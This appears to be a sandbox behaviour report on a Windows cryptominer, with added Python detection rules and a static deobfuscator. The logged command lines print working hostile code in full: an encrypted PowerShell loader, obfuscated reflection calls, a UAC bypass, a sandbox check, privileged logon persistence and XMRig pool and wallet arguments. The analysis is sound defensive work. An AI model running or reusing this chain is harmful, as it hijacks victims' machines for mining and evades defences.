Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
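The process-creation lines above form four distinct chains a detection engineer would want to match on: the hardware-model sandbox check (wmic diskdrive get Model piped into findstr with VM disk names), the Fodhelper UAC bypass (fodhelper.exe, an auto-elevating binary, spawning cmd.exe), the "services64" logon task created with /rl highest pointing at a binary under AppData\Local\Temp, and explorer.exe started by conhost.exe with XMRig arguments (pool, wallet, algorithm). The following Python is an added example, not part of the Joe Sandbox report and not code from the sample; it parses a constructed list of "Process created" lines copied from this report (the --cinit-stealth-targets blob is dropped from the explorer.exe line), runs the four rules over them and extracts the miner configuration from the explorer.exe command line. The rule names and the assumption that neither path in a line contains spaces are mine.

```python
import re

# Constructed sample: "Process created" lines copied from the report above
# (explorer.exe line shortened: the --cinit-stealth-targets value is omitted).
SAMPLE_EVENTS = [
    r'Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"',
    r'Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Process created: C:\Windows\System32\cmd.exe /c C:\Windows\System32\fodhelper.exe',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe C:\Windows\System32\fodhelper.exe',
    r'Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe"',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"',
    r'Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --randomx-mode=auto --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth',
]

# Assumption: neither the parent nor the image path contains spaces (true for this
# report). A real EDR feed delivers parent/image/command line as separate fields.
_EVENT = re.compile(r"^Source: (?P<parent>\S+) Process created: (?P<image>\S+) ?(?P<cmd>.*)$")
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Temp|Public)\\", re.I)
VM_DISK_MODELS = ("qemu harddisk", "dady harddisk", "vbox harddisk", "vmware virtual")
MINER_FLAGS = ("--algo=", "--url=", "--user=", "--randomx-mode", "--cinit-stealth", "--cpu-max-threads-hint")


def parse_events(lines):
    """Return (parent, image, cmdline) tuples for every 'Process created' line."""
    out = []
    for line in lines:
        m = _EVENT.match(line.strip())
        if m:
            out.append((m["parent"], m["image"], m["cmd"]))
    return out


def basename(path):
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def miner_config(cmdline):
    """Collect --flag=value pairs from an XMRig-style command line, unquoting values."""
    return {k: v.strip('"') for k, v in re.findall(r'--([\w-]+)=("[^"]*"|\S*)', cmdline)}


def detect(events):
    """Apply the four rules; returns (rule_name, detail) pairs."""
    findings = []
    for parent, image, cmd in events:
        p, img, low = basename(parent), basename(image), cmd.lower()
        # 1. fodhelper.exe is auto-elevated and never launches a shell by itself.
        if p == "fodhelper.exe":
            findings.append(("uac_bypass_fodhelper", f"fodhelper.exe -> {img}"))
        # 2. Highest-privilege logon task whose action lives in a user-writable directory.
        if img == "schtasks.exe" and "/create" in low and "/rl highest" in low and USER_WRITABLE.search(cmd):
            findings.append(("persistence_schtasks_highest", cmd))
        # 3. The real explorer.exe takes none of these flags; two or more means a miner host.
        if img == "explorer.exe" and sum(f in cmd for f in MINER_FLAGS) >= 2:
            cfg = miner_config(cmd)
            findings.append(("miner_args_in_explorer", f"pool={cfg.get('url')} wallet={cfg.get('user')}"))
        # 4. findstr over disk-model strings that only occur inside VMs and sandboxes.
        if img == "findstr.exe" and any(m in low for m in VM_DISK_MODELS):
            findings.append(("sandbox_check_disk_model", cmd))
    return findings


if __name__ == "__main__":
    for kind, detail in detect(parse_events(SAMPLE_EVENTS)):
        print(f"[{kind}] {detail}")
```

Rule 3 is the one worth tuning: explorer.exe launched by anything other than userinit.exe or explorer.exe itself is already unusual, and here the parent is conhost.exe, the process the miner's injector hollows. The 182 identical WMI queries for explorer.exe's CommandLine that the report attributes to conhost.exe fit the same picture, the controller polling the process it injected into.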
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](10
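The loader echoed into cmd.exe above (the `elgju`/`VIxdo`/`gYUmc` functions) and the powershell.EXE command lines that follow hide their .NET API names behind two cheap tricks: string literals padded with the junk token `blck` that `.Replace('blck', '')` strips at runtime, and names assembled from `'x'+[Char](N)` chains. Both undo statically, and the loader's own logic shows where the payload lives: the first `:: ` comment line of the .bat container, split on `\`, each part base64, then AES-CBC/PKCS7 with the hard-coded key and IV, then gzip, then `Assembly.Load`. The Python below is an added analysis aid, not part of this report or of the sample: it folds both obfuscation schemes, pulls the key and IV out of the script text, carves the stages from the .bat the way the loader does, and, only if the third-party `cryptography` package is installed, runs the same decrypt-then-inflate pipeline so the assemblies can be written to disk for static review rather than executed. The loader and `[Char]` fragments are copied from the command lines on this page; the .bat content is constructed.

```python
"""Added analysis helper (not part of this report or of the sample): undo the
loader's two string-obfuscation schemes statically and carve the encrypted
stages out of the .bat container, without executing anything."""
import base64
import gzip
import re
from typing import List, Tuple

# Scheme 1: '<literal padded with junk>'.Replace('<junk>', '') fed to Invoke-Expression.
_REPLACE_RE = re.compile(r"'((?:[^']|'')*)'\.Replace\('(\w+)', ''\)")


def strip_replace_obfuscation(script: str) -> str:
    """Apply each .Replace('<junk>', '') to its literal now (single pass, the same
    semantics as .NET String.Replace, so 'blblckck' stays 'blck' in both)."""
    return _REPLACE_RE.sub(
        lambda m: "'" + m.group(1).replace(m.group(2), "") + "'", script)


# Scheme 2: ''+[Char](82)+'e'+'f'+... chains that evaluate to one string.
_LIT = r"'(?:[^']|'')*'"
_CHR = r"\[Char\]\(\d+\)"
_PIECE_RE = re.compile(rf"{_LIT}|{_CHR}")
_CONCAT_RE = re.compile(rf"(?:{_LIT}|{_CHR})(?:\+(?:{_LIT}|{_CHR}))*")


def _eval_piece(piece: str) -> str:
    if piece.startswith("[Char]"):
        return chr(int(piece[7:-1]))
    return piece[1:-1].replace("''", "'")  # un-escape '' inside a literal


def fold_char_concat(script: str) -> str:
    """Collapse every 'a'+[Char](98)+''+'c' chain into the literal 'abc'."""
    def fold(m):
        text = "".join(_eval_piece(p) for p in _PIECE_RE.findall(m.group(0)))
        return "'" + text.replace("'", "''") + "'"
    return _CONCAT_RE.sub(fold, script)


def deobfuscate(script: str) -> str:
    return fold_char_concat(strip_replace_obfuscation(script))


# The loader hard-codes key and IV as base64 literals.
_B64 = r"\[System\.Convert\]::FromBase64String\('([A-Za-z0-9+/=]+)'\)"
_KEY_RE = re.compile(r"\.Key=" + _B64)
_IV_RE = re.compile(r"\.IV=" + _B64)


def extract_aes_params(script: str) -> Tuple[bytes, bytes]:
    key_m, iv_m = _KEY_RE.search(script), _IV_RE.search(script)
    if not (key_m and iv_m):
        raise ValueError("no hard-coded AES key/IV in script")
    return base64.b64decode(key_m.group(1)), base64.b64decode(iv_m.group(1))


def carve_bat_stages(bat_text: str) -> List[bytes]:
    """Mirror the loader: the first line beginning ':: ' carries the stages,
    separated by '\\', each base64.  The returned blobs are still encrypted."""
    for line in bat_text.splitlines():
        if line.startswith(":: "):
            return [base64.b64decode(part) for part in line[3:].split("\\")]
    return []


def decrypt_stage(blob: bytes, key: bytes, iv: bytes) -> bytes:
    """AES-CBC/PKCS7 then gzip, the loader's elgju -> VIxdo pipeline.  Needs the
    third-party 'cryptography' package; the result is a .NET assembly to open in
    a disassembler, never to load."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(blob) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return gzip.decompress(unpad.update(padded) + unpad.finalize())


# Fragments copied verbatim from the command lines in this report.
LOADER_FRAGMENT = (
    "$KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); "
    "$KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); "
    "Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckc"
    "blcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckd"
    "blck([byte[]]$CRcTF);'.Replace('blck', '');"
)
CHAR_FRAGMENT = (
    "(New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)"
    "+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'"
    "+''+[Char](116)+''+[Char](101)+''))"
)
# Constructed stand-in for the .bat container: two base64 stages after ':: '.
CONSTRUCTED_BAT = (
    "@echo off\r\n:: "
    + base64.b64encode(b"stage-one").decode() + "\\"
    + base64.b64encode(b"stage-two").decode()
    + "\r\nexit /b\r\n"
)

if __name__ == "__main__":
    print(deobfuscate(LOADER_FRAGMENT))
    print(deobfuscate(CHAR_FRAGMENT))
    key, iv = extract_aes_params(LOADER_FRAGMENT)
    print(f"AES-{len(key) * 8}-CBC, IV {iv.hex()}")
    for i, blob in enumerate(carve_bat_stages(CONSTRUCTED_BAT)):
        print(f"stage {i}: {len(blob)} ciphertext bytes")
```

Run against the real `b.bat` the output of `carve_bat_stages` has two blobs, matching the two `gYUmc` calls at the end of the loader; the 32-byte key identifies the cipher as AES-256-CBC. Keep `decrypt_stage` output in a quarantined directory: it is the same bytes the loader hands to `Assembly.Load`.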
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kveHNQwSSGcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mhKVIvEXzPrIho,[Parameter(Position=1)][Type]$QOutAUbbtF)$MsesbhAsMah=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+'o'+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MsesbhAsMah.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mhKVIvEXzPrIho).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$MsesbhAsMah.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+'eB'+'y'+'S'+'i'+'g'+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QOutAUbbtF,$mhKVIvEXzPrIho).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+'d');Write-Output $MsesbhAsMah.CreateType();}$gFfWslPcsIxEF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$xRDavNIGnzLLon=$gFfWslPcsIxEF.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Cha
